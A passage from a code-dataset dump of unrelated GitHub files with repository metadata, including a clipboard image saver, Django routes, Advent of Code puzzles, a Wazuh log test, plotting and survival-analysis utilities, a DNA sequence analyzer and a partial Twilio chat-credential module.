work_path)\n\n","repo_name":"skely/Sign-Language","sub_path":"EAF_parser.py","file_name":"EAF_parser.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73033529973","text":"import os\nimport time\n\n\nclass OSXGrab(object):\n def __init__(self, picture_folder, picture_suffix):\n self.picture_folder = picture_folder\n self.picture_suffix = picture_suffix\n\n def save_picture(self):\n date_time = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))\n picture_name = date_time + '.' + self.picture_suffix\n picture_path = os.path.join(self.picture_folder, picture_name)\n try:\n os.system('/usr/local/bin/pngpaste {}'.format(picture_path))\n if os.path.exists(picture_path):\n print('get image from pasteboard success.')\n return picture_path\n else:\n print('there is no picture in clipboard!')\n except Exception as e:\n print('get picture from clipboard error because: {}'.format(e))\n return ''\n\nif __name__ == '__main__':\n OSXGrab('.', 'png').save_picture()","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/kingname_MarkdownPicPicker/MarkdownPicPicker-master/ImageGrab/OSXGrab.py","file_name":"OSXGrab.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"22369063836","text":"from django.urls import path, include\nfrom . import views\nfrom django.contrib import admin\n\napp_name = \"student\"\n\n\nurlpatterns = [\n path(\"\", views.homepage, name=\"homepage\"),\n path(\"index\", views.index, name=\"index\"),\n path(\"register\", views.register_request, name=\"register\"),\n path(\"login\", views.login_request, name=\"login\"),\n path('student/', views.student_by_id, name='student_by_id'),\n path(\"newstudent\", views.creating_student, name=\"newstudent\"),\n path(\"update/\", views.update_view, name=\"update\"),\n path('api/login', views.login, name=\"api_login\"),\n path('api/update/', views.api_update, name=\"api_update\"),\n path('api/delete/', views.api_delete, name=\"api_delete\"),\n\n\n\n]\n","repo_name":"moolasudhakarreddy31/Student_App","sub_path":"student/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35566419125","text":"from collections import deque \n\nf = open(\"input.txt\", \"r\")\n#f = open(\"testInput.txt\", \"r\")\ndat = f.read()\n\ndoublingPeriod = 7\nq = deque()\n\nfor num in dat.split(\",\"):\n q.append(int(num))\nq.append(None)\n\n#print(q)\n\nfor i in range(80):\n node = q.popleft()\n \n while node is not None:\n #print(node)\n\n node -= 1\n if node < 0:\n q.append(8)\n q.append(6)\n else:\n q.append(node)\n \n node = q.popleft()\n\n q.append(None)\n #print()\n\nprint(len(q)-1)\n\n\n\n","repo_name":"rohilG/advent_of_code_2021","sub_path":"day6a.py","file_name":"day6a.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18383159031","text":"from glob import glob\nfrom mmap import mmap, ACCESS_READ\nfrom os.path import join, dirname, realpath\nfrom re import compile\n\nimport pytest\nfrom yaml import safe_load\n\ntest_data_path = join(dirname(realpath(__file__)), 'data')\nconfiguration = safe_load(open(join(test_data_path, 'configuration.yaml')))['configuration']\nnode_name = compile(r'.*/(master|worker_[\\d]+)/logs/cluster.log')\nintegrity_regex = compile(r'.*Compressing \\'files_metadata.json\\' of ([0-9]*) files.*|'\n r'(.*Files to create: ([0-9]*) \\| Files to update: '\n r'([0-9]*) \\| Files to delete: ([0-9]*) \\| Files to send: ([0-9]*).*)'.encode())\nrepeated_syncs = {}\n\n\ndef test_cluster_sync(artifacts_path):\n \"\"\"Check that the number of files synced is not identical multiple times in a row.\n\n In case that the number of files synced is identical multiple times in a row, the number of files\n for which the MD5 is calculated is also checked. If multiple identical syncs are repeated and the\n number of calculated MD5s does not change, the test is marked as failed.\n\n Args:\n artifacts_path (str): Path where folders with cluster information can be found.\n \"\"\"\n if not artifacts_path:\n pytest.fail('Parameter \"--artifacts_path=\" is required.')\n\n cluster_log_files = glob(join(artifacts_path, 'worker_*', 'logs', 'cluster.log'))\n if len(cluster_log_files) == 0:\n pytest.fail(f'No files found inside {artifacts_path}.')\n\n repeat_counter = 0\n for log_file in cluster_log_files:\n with open(log_file) as f:\n s = mmap(f.fileno(), 0, access=ACCESS_READ)\n sync_logs = integrity_regex.findall(s)\n if not sync_logs:\n pytest.fail(f'No integrity sync logs found in {node_name.search(log_file)[1]}')\n\n for i in range(len(sync_logs)):\n # Compare whether current log and the previous one are equal.\n if sync_logs[i][1] and sync_logs[i-2][1] and sync_logs[i-2][2:] == sync_logs[i][2:]:\n # If missing files are being synced, the number of calculated MD5 should be different\n # in the following iteration.\n if sync_logs[i][2] != b'0' or sync_logs[i][4] != b'0':\n # If same number of missing files is synced, MD5 count should remain the same.\n if sync_logs[i][2] != sync_logs[i][4]:\n if sync_logs[i-1][0] and sync_logs[i+1][0] and sync_logs[i-1] == sync_logs[i+1]:\n repeat_counter += 1\n # If only 1 shared file is synced, it could be the 'client.keys' so it doesn't count as a repeated\n # log (agents could be registering).\n elif sync_logs[i][2:] != (b'0', b'1', b'0', b'0'):\n repeat_counter += 1\n\n if repeat_counter >= configuration['repeat_threshold']:\n repeated_syncs[node_name.search(log_file)[1]] = {\n 'log': sync_logs[i][1].decode(),\n 'repeat_counter': repeat_counter\n }\n elif sync_logs[i][1]:\n repeat_counter = 1\n\n assert not repeated_syncs, '\\n' + '\\n'.join('Found {repeat_counter} times in a row in {worker}: {log}'.format(\n **values, worker=worker) for worker, values in repeated_syncs.items())\n","repo_name":"wazuh/wazuh-qa","sub_path":"tests/reliability/test_cluster/test_cluster_logs/test_cluster_sync/test_cluster_sync.py","file_name":"test_cluster_sync.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"30688451131","text":"#https://adventofcode.com/2022/day/7\r\n#from __future__ import annotations\r\n\r\nfrom typing import Iterator\r\nimport itertools_recipes as ir\r\nimport collections\r\n\r\ntest_input=\"\"\"\r\n$ cd /\r\n$ ls\r\ndir a\r\n14848514 b.txt\r\n8504156 c.dat\r\ndir d\r\n$ cd a\r\n$ ls\r\ndir e\r\n29116 f\r\n2557 g\r\n62596 h.lst\r\n$ cd e\r\n$ ls\r\n584 i\r\n$ cd ..\r\n$ cd ..\r\n$ cd d\r\n$ ls\r\n4060174 j\r\n8033020 d.log\r\n5626152 d.ext\r\n7214296 k\r\n\"\"\"\r\n\r\n\r\nclass File:\r\n def __init__(self, size, name):\r\n self.size = int(size)\r\n self.name = name\r\n\r\n def __len__(self):\r\n return self.size\r\n\r\n def __repr__(self):\r\n return f\"{type(self).__name__}({self.size!r}, {self.name!r})\"\r\n\r\n def __str__(self):\r\n return f\"{self.name} (file, size={self.size})\"\r\n\r\nclass Folder(collections.UserList):\r\n \r\n def __init__(self, name, content=()):\r\n self.name = name\r\n super().__init__(content)\r\n\r\n def __repr__(self):\r\n return f\"{type(self).__name__}({self.name!r}, {self.data!r})\"\r\n\r\n @property\r\n def size(self):\r\n return sum( x.size for x in self )\r\n\r\n def pprint(self, ident:int=0):\r\n print(\" \"*ident,\"-\", self.name, f\"(dir, size={self.size})\")\r\n ident+=2\r\n for x in self:\r\n if isinstance(x, type(self)):\r\n x.pprint(ident)\r\n elif isinstance(x, File):\r\n print(\" \"*ident,\"-\", x)\r\n else:\r\n print(\" \"*ident,\"UNKNOW TYPE\",repr(x))\r\n\r\n\r\n\r\ndef process_data(data:str) -> Iterator[tuple[str,...]]:\r\n \"\"\"transform the raw data into a procesable form \"\"\"\r\n return ir.isplit(ir.insert_marker(ir.interesting_lines(data),\"\",lambda x:\"$\" in x,after=False))\r\n \r\n \r\ndef get_raw_data(path:str=\"./input.txt\") -> str:\r\n with open(path) as file:\r\n return file.read()\r\n\r\ndef ls_command(data:list[str]):\r\n def make(item:str):\r\n kind, name = item.split()\r\n if kind==\"dir\":\r\n return Folder(name)\r\n if kind.isnumeric():\r\n return File(kind, name)\r\n raise ValueError(f\"unexpected item: {item!r}\")\r\n \r\n return [make(x) for x in data]\r\n\r\ndef build_folder_tree(data, current_folder:Folder=None):\r\n iter_data = iter(data)\r\n while True:\r\n try:\r\n command, *data = next(iter_data)\r\n except StopIteration:\r\n return current_folder\r\n if command == \"$ cd /\":\r\n if current_folder is None:\r\n current_folder = Folder(\"/\")\r\n continue\r\n if command == \"$ ls\":\r\n current_folder.extend(ls_command(data))\r\n continue\r\n if command == \"$ cd ..\":\r\n return current_folder\r\n if command.startswith(\"$ cd\"):\r\n _,_,name = command.split()\r\n next_folder = next( f for f in current_folder if isinstance(f,Folder) and f.name == name)\r\n build_folder_tree(iter_data, next_folder)\r\n \r\n \r\ndef walk(folder:Folder) -> Iterator[Folder]:\r\n yield folder\r\n for x in folder:\r\n if isinstance(x,Folder):\r\n yield from walk(x)\r\n\r\ndef part1(data:str) -> int:\r\n \"\"\"part 1 of the puzzle \"\"\"\r\n root = build_folder_tree(process_data(data))\r\n return sum( f.size for f in walk(root) if f.size<=100_000 )\r\n \r\n \r\n\r\ndef part2(data:str) -> None:\r\n \"\"\"part 2 of the puzzle \"\"\"\r\n root = build_folder_tree(process_data(data))\r\n total = 70000000\r\n unused = total - root.size\r\n need = 30000000\r\n candidatos = sorted(walk(root),key=lambda f:f.size)\r\n #print([c.size for c in candidatos])\r\n for folder in candidatos:\r\n free = folder.size\r\n if need < (unused + free):\r\n return free\r\n \r\n \r\n \r\ndef test1() -> bool:\r\n return 95437 == part1(test_input)\r\n\r\ndef test2() -> bool:\r\n return 24933642 == part2(test_input)\r\n\r\n\r\n\r\n#root=build_folder_tree(process_data(test_input))\r\n#root.pprint()\r\n\r\n\r\n\r\ndata = get_raw_data()\r\nassert test1(),\"fail test 1\"\r\nprint(\"solution part1\", part1(data)) #1206825\r\nassert test2(),\"fail test 2\"\r\nprint(\"solution part2\", part2(data)) #9608311\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"copperfield42/Advent-of-Code-2022","sub_path":"day07/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"872743992","text":"import click\nimport pandas as pd\nimport seaborn as sns\nfrom pathlib import Path\nfrom matplotlib import pyplot as plt\n\nsns.set_palette('bright')\nsns.set_style(\"whitegrid\")\n\ndef load_data(inputfile, xcolumn, ycolumn):\n\t# Generate a list of Path objects by searching CSV files\n\tfilepath = [Path(file) for file in inputfile]\n\t# Iterate through each path in list and open it as a DataFrame\n\tdata_frames = dict()\n\tfor path in filepath:\n\t\tdf = pd.read_csv(path)\n\t\tif (xcolumn == 'index' or ycolumn == 'index') and 'index' not in df.columns:\n\t\t\tdf['index'] = df.index + 1\n\t\ttry:\n\t\t\tdata_frames[path.stem] = df[[xcolumn, ycolumn]]\n\t\texcept KeyError:\n\t\t\tprint(f'{path} does not have {[ col for col in [xcolumn, ycolumn] if col not in df.columns ]} column names!')\n\treturn data_frames\n\n@click.group()\ndef cli():\n\tpass\n\n@cli.command()\n@click.argument('INPUTFILE', type=click.Path(exists=True, dir_okay=False), nargs=-1, required=True)\n@click.option('-x', type=click.Tuple([str, str]), required=True, help='X axis: CSV column name and label.')\n@click.option('-y', type=click.Tuple([str, str]), required=True, help='Y axis: CSV column name and label.')\n@click.option('-t', type=click.STRING, help='Plot title.')\ndef lineplot(**kwargs):\n\tdata_frames = load_data(kwargs['inputfile'], kwargs['x'][0], kwargs['y'][0])\n\tax = None\n\tfor filename, df in data_frames.items():\n\t\tax = sns.lineplot(x=kwargs['x'][0], y=kwargs['y'][0], data=df, label=filename)\n\tax.set(title=kwargs['t'], xlabel=kwargs['x'][1], ylabel=kwargs['y'][1])\n\tplt.tight_layout()\n\tplt.show()\n\nif __name__ == '__main__':\n\tcli()","repo_name":"CesarRocha00/evobci-data-analysis","sub_path":"csv_plotter.py","file_name":"csv_plotter.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33205551475","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n\n@author: Leandro\n\"\"\"\n\nfrom numpy import array \n\n#Funcao que resolve quando a matriz e triangular\ndef resolveTri(A):\n n = len(A) - 1\n res = []\n\n for i in range(len(A)):\n j = len(A) - 1\n x = []\n r = 0.0\n while (A[n][j] != 0):\n x.append(A[n][j])\n j = j - 1\n if j < 0:\n break\n if len(x) == 1:\n res.append(A[n][-1] / x[0])\n else:\n i = 0\n for i in range(len(res)):\n r = x[i] * res[i] + r\n res.append((A[-n][-1] - r) / x[-1])\n n = n - 1\n return res\n\n#Funcao que acha o maior numero entre os valores da coluna passada\ndef achaMaior(A, i, j):\n maior = 0\n maiorIndice = i\n while i < len(A):\n if abs(A[i][j]) > maior:\n maior = A[i][j]\n maiorIndice = i\n i += 1\n return maiorIndice\n\ndef gauss(A):\n for j in range(len(A[0]) - 1):\n i = j\n maior = achaMaior(A, i, j)\n aux = A[i]\n A[i] = A[maior]\n A[maior] = aux\n j1 = j\n div = A[i][j]\n while j1 < len(A[i]):\n A[i][j1] = A[i][j1] / div\n j1 += 1\n i += 1\n while i < len(A):\n mul = A[i][j]\n for j1 in range(len(A[0])):\n A[i][j1] -= A[j][j1] * mul\n i += 1\n print ('\\nMatriz apos pivotacao\\n')\n print (A)\n r = resolveTri(A)\n return r\n\nA = array([ [ 2., 2., 1., 1.],\n [ 1.,-1., 2.,-1.],\n [ 3., 2.,-3.,-2.],\n [ 4., 3., 2., 1.] ])\n\nB = array([ [ 7.],\n [ 1.],\n [ 4.],\n [12.] ])\n\ngauss(A)\n#print(gauss(A))\n","repo_name":"leandromarquesssantos/CalculoN","sub_path":"Python/gauss.py","file_name":"gauss.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71003921974","text":"from model.voivodeship import Voivodeship\nfrom model.county import County\nfrom model.community import Community\nfrom model.statistic import Statistic\nimport os, sys\n\nclass Controller:\n\n def __init__(self, ui, dao):\n self.ui = ui\n self.dao = dao\n self.dao.load_file()\n self.start_controller()\n\n def start_controller(self):\n self.start = 1\n while self.start:\n self.ui.print(self.ui.create_menu(self.ui.menu ,self.ui.title))\n self.user = self.ui.user_choice(self.ui.menu)\n self.handle_menu()\n\n def handle_menu(self):\n if self.user == 1:\n self.display_stats()\n elif self.user == 2:\n self.show_longest_name()\n elif self.user == 3:\n self.display_biggest_county()\n elif self.user == 4:\n self.check_same_locations()\n elif self.user == 5:\n self.advanced_search()\n elif self.user == 0:\n sys.exit('bye')\n\n @staticmethod\n def calculate_stats():\n for unit in Statistic.all_units:\n for type, amount in Statistic.statistic.items():\n if unit.type == type:\n Statistic.statistic[type] += 1\n\n def display_stats(self):\n self.calculate_stats()\n self.ui.print(self.ui.show_stats(Statistic.statistic))\n\n def show_longest_name(self):\n cities = {city.name:len(city.name) for city in Statistic.all_units if city.type == 'miasto'}\n cities = sorted(cities, key=lambda value:cities[value], reverse = True)\n self.ui.print(self.ui.create_menu(cities[0:3], self.ui.title1))\n\n def display_biggest_county(self):\n self.ui.print(max(County.all_counties, key=lambda county:len(county.communities)).name)\n\n def check_same_locations(self):\n locations = {}\n for location in Statistic.all_units:\n if location.name not in locations:\n locations[location.name] = 1\n else:\n locations[location.name] += 1\n\n locations = {k:v for k,v in locations.items() if v > 1}\n self.ui.print(self.ui.show_stats(locations))\n\n def advanced_search(self):\n user = self.ui.search_input()\n search_list = sorted([unit.name+'--->'+unit.type for unit in Statistic.all_units if user in unit.name])\n self.ui.print(self.ui.create_menu(search_list, self.ui.title2))","repo_name":"Ziem0/Neighbour","sub_path":"controller/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21499424677","text":"import inspect\n\nfrom autograd import elementwise_grad\n\nfrom surpyval import np\nfrom surpyval.parametric.parametric_fitter import ParametricFitter\n\n\nclass CustomDistribution(ParametricFitter):\n def __init__(self, name, fun, param_names, bounds, support):\n if str(inspect.signature(fun)) != \"(x, *params)\":\n detail = \"Function must have the signature '(x, *params)'\"\n raise ValueError(detail)\n\n if len(param_names) != len(bounds):\n raise ValueError(\"param_names and bounds must have same length\")\n\n if \"p\" in param_names:\n detail = \"'p' reserved parameter name for LFP distributions\"\n raise ValueError(detail)\n\n if \"gamma\" in param_names:\n detail = \"'gamma' reserved parameter name for offset distributions\"\n raise ValueError(detail)\n\n if \"f0\" in param_names:\n detail = (\n \"'f0' reserved parameter name for zero\"\n + \"inflated or hurdle models\"\n )\n raise ValueError(detail)\n\n for p_name in param_names:\n if hasattr(self, p_name):\n detail = \"Can't name a parameter after a function\"\n raise ValueError(detail)\n\n super().__init__(\n name=name,\n k=len(param_names),\n bounds=bounds,\n support=support,\n param_names=param_names,\n param_map={v: i for i, v in enumerate(param_names)},\n plot_x_scale=\"linear\",\n y_ticks=np.linspace(0, 1, 11),\n )\n self.Hf = fun\n self.hf = lambda x, *params: elementwise_grad(self.Hf)(x, *params)\n self.sf = lambda x, *params: np.exp(-self.Hf(x, *params))\n self.ff = lambda x, *params: 1 - np.exp(-self.Hf(x, *params))\n self.df = lambda x, *params: elementwise_grad(self.ff)(x, *params)\n\n def _parameter_initialiser(self, x, c=None, n=None, t=None, offset=False):\n out = []\n for low, high in self.bounds:\n if (low is None) & (high is None):\n out.append(0)\n elif high is None:\n out.append(low + 1.0)\n elif low is None:\n out.append(high - 1.0)\n else:\n out.append((high + low) / 2.0)\n\n return out\n\n def mpp_inv_y_transform(self, y, *params):\n return y\n\n def mpp_y_transform(self, y, *params):\n return y\n\n def mpp_x_transform(self, x, gamma=0):\n return x - gamma\n","repo_name":"derrynknife/SurPyval","sub_path":"surpyval/parametric/custom_distribution.py","file_name":"custom_distribution.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"21"} +{"seq_id":"11360325093","text":"'''\nДо КОНЦА 1\nНа вход программе подается последовательность слов, каждое слово на отдельной строке. \nКонцом последовательности является слово «КОНЕЦ» (без кавычек). \nНапишите программу, которая выводит члены данной последовательности.\n#\nФормат входных данных\nНа вход программе подается последовательность слов, каждое слово на отдельной строке.\n#\nФормат выходных данных\nПрограмма должна вывести члены данной последовательности.\n'''\n# + еще несколько задач было решено\n\nsome_text = input()\ncount = 0\nwhile some_text != 'стоп' and some_text != 'хватит' and some_text != 'достаточно':\n # print(some_text)\n some_text = input()\n count += 1\n if some_text == 'стоп' or some_text == 'хватит' or some_text == 'достаточно':\n print(count)","repo_name":"p1pk4/StepikTasks","sub_path":"For_While/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4418906520","text":"from collections import defaultdict\n\nclass Graph:\n def __init__(self, vertices):\n self.V = vertices\n self.graph = defaultdict(list)\n\n def addEdge(self, u, v):\n self.graph[u].append(v)\n\n def printAllPathsUtil(self, u, d, visited, path):\n\n #Mark the current node as visited and store in path\n visited[u] = True\n path.append(u)\n\n #If current vertex is same as destination, then print current path[]\n if u == d:\n print(path)\n\n else:\n #If current vertex is not destination\n #Recur for all the vertices adjacent to this vertex\n for i in self.graph[u]:\n if visited[i] == False:\n self.printAllPathsUtil(i, d, visited, path)\n\n #Remove current vertex from path[] and mark it as unvisited\n path.pop()\n visited[u] = False\n\n def printAllPaths(self, s, d):\n\n visited = [False] * (self.V)\n\n path = []\n\n self.printAllPathsUtil(s, d, visited, path)\n\n\ng = Graph(4)\ng.addEdge(0, 1)\ng.addEdge(0, 2)\ng.addEdge(0, 3)\ng.addEdge(2, 0)\ng.addEdge(2, 1)\ng.addEdge(1, 3)\n\ns = 2\nd = 3\nprint(\"Following are all different paths from %d to %d :\" % (s, d))\ng.printAllPaths(s, d)\n\n\n\n\n\n","repo_name":"Taoge123/LeetCode","sub_path":"TopInterviewQuestions/AllPath.py","file_name":"AllPath.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14452619973","text":"# The main function effectively runs the entire code, calling the fuctions in the correct order.\r\n# It starts by calling the intro function, then it establishing the input file, and output file names.\r\n# It proceeds to then open the input file, and store the contents of the input file into a variable.\r\n# A for loop is then used to go through the contents of the input file, and stores the proper data into a nucleotide sequence...\r\n# into a variable.\r\n# The count function is then called, along with the mass function.\r\n# Followed by the codons_list function, then the output function.\r\n# It finishes by writing all of the outputs from the variaous functions into an output file that was named when\r\n# asking the user for the output file name.\r\ndef main():\r\n intro_message()\r\n in_file = input(\"Input file name? \")\r\n out_file = input(\"Output file name? \")\r\n with open(in_file) as f:\r\n lines = f.readlines()\r\n for i in range(0, len(lines), 2):\r\n name = lines[i]\r\n nuc = lines[i + 1]\r\n nuc = nuc.upper()\r\n count_l, junk_count = get_count(nuc)\r\n mass_l, total_m = get_mass(count_l, junk_count)\r\n codon_l = codons_list(nuc)\r\n is_pro = is_protein(codon_l, mass_l)\r\n output_l = output(name, nuc, count_l, mass_l, total_m, codon_l, is_pro)\r\n with open(out_file, 'a') as o:\r\n for line in output_l:\r\n o.write(line)\r\n \r\n\r\n# This function prints the intro statement that is placed at the beginning of the file.\r\ndef intro_message():\r\n print(\"This program reports information about DNA\\nnucleotide sequences that may encode proteins.\")\r\n \r\n\r\n\r\n# This function effectively determines the amount of \"A\", \"C\", \"G\", and \"T\", values in the nucleotide\r\n# sequence of the region name and returns a list of those counts, as well as amount of \"-\",\r\n# or \"junk\".\r\ndef get_count(chain):\r\n a_count = 0\r\n c_count = 0\r\n g_count = 0\r\n t_count = 0\r\n junk_count = 0\r\n for nuc in chain:\r\n if nuc == \"A\":\r\n a_count += 1\r\n elif nuc == \"C\":\r\n c_count += 1\r\n elif nuc == \"G\":\r\n g_count += 1\r\n elif nuc == \"T\":\r\n t_count += 1\r\n elif nuc == \"-\":\r\n junk_count += 1\r\n count_list = [a_count, c_count, g_count, t_count]\r\n return count_list, junk_count\r\n\r\n# This function compares the mass of each individual nucleotides and calculates the\r\n# mass percentage of each ACGT nucleotide value and returns a list of those percentages.\r\n# It also returns the total mass of all the nucleotides combined.\r\ndef get_mass(count_list, junk_count):\r\n a_count = count_list[0]\r\n c_count = count_list[1]\r\n g_count = count_list[2]\r\n t_count = count_list[3]\r\n amass_t = a_count * 135.128\r\n cmass_t = c_count * 111.103\r\n gmass_t = g_count * 151.128\r\n tmass_t = t_count * 125.107\r\n junk_t = junk_count * 100\r\n total_mass = round(amass_t + cmass_t + gmass_t + tmass_t + junk_t, 1)\r\n a_pct = round((amass_t / total_mass) * 100, 1)\r\n c_pct = round((cmass_t / total_mass) * 100, 1)\r\n g_pct = round((gmass_t / total_mass) * 100, 1)\r\n t_pct = round((tmass_t / total_mass) * 100, 1)\r\n mass_list = [a_pct, c_pct, g_pct, t_pct]\r\n return mass_list, total_mass\r\n\r\n# This function splits the nucleotide sequence into codons, then puts each codon as an element\r\n# into a list. That list is then returned.\r\ndef codons_list(nucleotide):\r\n codon_list = []\r\n nucleotide = nucleotide.split(\"-\")\r\n nucleotide = \"\".join(nucleotide)\r\n for i in range(0, len(nucleotide) - 2, 3):\r\n var = nucleotide[i] + nucleotide[i + 1] + nucleotide[i + 2]\r\n codon_list.insert(i, var)\r\n return codon_list\r\n\r\n# This function takes the codon list that was returned and proceeds to determine if it meets all of the requirements\r\n# of being a protein. If it is determined to be a protein, the is_protein varaible is stored as YES, if not, is_protein\r\n# is stored as NO... is_protein is then returned.\r\ndef is_protein(codon_list, mass_list):\r\n is_protein = \"\"\r\n end_codons = [\"TAA\", \"TAG\", \"TGA\"]\r\n c_pct = mass_list[1]\r\n g_pct = mass_list[2]\r\n if codon_list[0] == \"ATG\":\r\n if codon_list[len(codon_list) - 1] in end_codons:\r\n if len(codon_list) >= 5:\r\n if c_pct + g_pct > 30.0:\r\n is_protein = \"YES\"\r\n else:\r\n is_protein = \"NO\"\r\n else:\r\n is_protein = \"NO\"\r\n else:\r\n is_protein = \"NO\"\r\n else:\r\n is_protein = \"NO\"\r\n return is_protein\r\n \r\n \r\n \r\n \r\n# This function effectively stores all of the outputted information into a list so that the main function can write\r\n# all of these values into the output file. Once it does this it returns the output list.\r\ndef output(name, nuc, count_list, mass_list, total_mass, codon_list, protein):\r\n output_l = []\r\n output_l.append(f\"Region Name: {name}\")\r\n output_l.append(f\"Nucleotides: {nuc}\") \r\n output_l.append(f\"Nuc. Counts: {count_list}\")\r\n output_l.append(\"\\n\")\r\n output_l.append(f\"Total Mass%: {mass_list} of {total_mass}\")\r\n output_l.append(\"\\n\")\r\n output_l.append(f\"Codons List: {codon_list}\")\r\n output_l.append(\"\\n\")\r\n output_l.append(f\"Is Protein?: {protein}\")\r\n output_l.append(\"\\n\")\r\n output_l.append(\"\\n\")\r\n return output_l\r\n \r\n \r\nmain()\r\n","repo_name":"ajmastra/DNA-processing-LAB6","sub_path":"dna.py","file_name":"dna.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"36695272162","text":"import math\n\nnum_magnolias = int(input())\nnum_hyacinths = int(input())\nnum_roses = int(input())\nnum_cacti = int(input())\nprc_gift = float(input())\n\nmagnolias = 3.25\nhyacinths = 4\nrose = 3.50\ncacti = 8\n\ntotal = (num_magnolias * magnolias) + (num_hyacinths * hyacinths) + (num_cacti * cacti) + (num_roses * rose)\ntotal_after_taxes = total * 0.95\n\nif total_after_taxes >= prc_gift:\n print(f\"She is left with {math.floor(total_after_taxes - prc_gift)} leva.\")\nelse:\n print(f\"She will have to borrow {math.ceil(prc_gift - total_after_taxes)} leva.\")\n","repo_name":"BlackRock17/Programming-Basics-Python-2022","sub_path":"Conditional_Statement/flower_shop.py","file_name":"flower_shop.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38899283485","text":"import streamlit as st\nimport pandas as pd\n\n\ndef upload():\n upload_csv = st.file_uploader('upload csv',type='csv',label_visibility=\"hidden\")\n \n if upload_csv is not None:\n upload_csv = pd.read_csv(upload_csv)\n st.write(upload_csv.head(5))\n \n return upload_csv\n\n\ndef upload_all():\n \"\"\"only use all points data (This function will be removed)\"\"\"\n st.markdown('### upload all points GIS-data')\n all_points = st.file_uploader('upload all points data',type='csv',label_visibility=\"hidden\")\n \n if all_points is not None:\n all_points = pd.read_csv(all_points)\n st.write(all_points.head(5))\n \n return all_points\n","repo_name":"shosuke-13/Stream-GBM","sub_path":"modules/file_uploader.py","file_name":"file_uploader.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"32707990156","text":"import uuid\n\nimport settings\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom sqlalchemy.orm import joinedload\nfrom twilio.util import TwilioCapability\n\nfrom trsvcscore.db.models import Chat\n\nfrom factory.db import db_session_factory\nfrom rest import fields\nfrom rest.alchemy.transaction import AlchemyTransaction\nfrom rest.authorization import ResourceAuthorizer\nfrom rest.exceptions import AuthorizationError, ResourceNotFound\nfrom rest.alchemy.manager import AlchemyResourceManager\nfrom rest.alchemy.query import AlchemyQuery\nfrom rest.resource import Resource\nfrom resources.chat import ChatResource\n\nclass ChatCredentialAuthorizer(ResourceAuthorizer):\n def __init__(self, db_session_factory):\n super(ChatCredentialAuthorizer, self).__init__()\n self.transaction_factory = lambda: AlchemyTransaction(db_session_factory)\n\n def authorize_create_query(self, context, request, query):\n resource = context.data\n\n with self.transaction_factory() as db_session:\n user_id = context.user_id\n chat_id_field = resource.desc.fields_by_name[\"chat_id\"]\n chat_id = chat_id_field.validate_for_model(resource.chat_id)\n db_query = db_session.query(Chat) \\\n .filter(Chat.id == chat_id) \\\n .options([joinedload(Chat.chat_participants)])\n chat = db_query.one()\n \n if chat.end is not None:\n msg = \"chat credentials cannot be created for ended chat\"\n raise AuthorizationError(message=msg,\n developer_message=msg,\n user_message=msg)\n\n participant_ids = [p.user_id for p in chat.chat_participants]\n if user_id not in participant_ids:\n msg = \"non-participants cannot create chat credentials\"\n raise AuthorizationError(message=msg,\n developer_message=msg,\n user_message=msg)\n return query\n\nclass ChatCredentialManager(AlchemyResourceManager):\n def __init__(self, *args, **kwargs):\n kwargs[\"query_class\"] = ChatCredentialQuery\n super(ChatCredentialManager, self).__init__(*args, **kwargs)\n\n\nclass ChatCredentialQuery(AlchemyQuery):\n def __init__(self, resource_class, transaction_factory):\n super(ChatCredentialQuery, self).__init__(\n resource_class, transaction_factory)\n\n def create(self, **kwargs):\n resource = kwargs.pop(\"resource\", None)\n if resource is None:\n resource = self.resource_class(**kwargs)\n\n resource.id = uuid.uuid4().hex\n resource.token = self._get_chat_token(resource)\n resource.twilio_capability = self._get_twilio_capability(resource)\n return resource\n \n def _get_chat_token(self, resource):\n chat_id_field = self.resource_class.desc.fields_by_name[\"chat_id\"]\n chat_id = chat_id_field.validate_for_model(resource.chat_id)\n\n with self.transaction_factory() as db_session:\n query = db_session.query(Chat) \\\n .filter(Chat.id == chat_id)\n try: \n chat = query.one()\n return chat.token\n except NoResultFound:\n raise ResourceNotFound()\n\n def _get_twilio_capability(self, resource):\n 